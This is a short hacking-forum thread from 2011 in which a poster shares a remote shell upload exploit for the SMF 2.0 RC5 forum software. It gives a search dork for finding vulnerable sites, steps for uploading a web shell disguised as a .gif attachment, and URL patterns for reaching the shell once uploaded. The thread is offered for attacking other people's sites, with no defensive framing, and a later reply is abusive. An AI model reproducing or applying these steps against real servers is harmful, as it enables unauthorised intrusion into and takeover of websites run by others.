+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: SMF 2.0 RC5 Remote Shell Upload Exploit (/Thread-SMF-2-0-RC5-Remote-Shell-Upload-Exploit)
SMF 2.0 RC5 Remote Shell Upload Exploit - jalal77 - 04-19-2011
hi guys i m new in this community i m going to share something ...i did any mistake plzz dont comment wid abusive..ok lets start
Go0Gle D0rk : "Powered by SMF 2.0 RC5 "
# Exploit :
You Are Can Upload The Shell in (attachments) Folder from 'SMF 2.0 RC5'
(+) In Any Topic .. Submit New Reply and Upload Shell (*.gif) on Attachment
(+) After Reply .. You Are Can Acess to Shell in :
> http://[target/Path]/attachments/{fileID}_{fileHASH}
> The HASH Is encoder by : SHA1
(+) Because the 'SMF 2.0 RC5' Change the Any Attach name Ex :
'1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca' << This is From Ex file I'm uploaded From My Local SMF
(+) After You Are Detect The SHA HASH .. acess in the shell !
Usage : http://127.0.0.1:8888/smf/attachments/1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca
OR acess in this url :
> http://[target/Path]/index.php?action=dlattach;topic={topicID};attach={attach-SHELL-id};image
but this acess with URL not suceeding always plz dont forget to comment...:p
RE: SMF 2.0 RC5 Remote Shell Upload Exploit - jalal77 - 04-21-2011
who is this idiot&why he saying his own name(fuckoff)????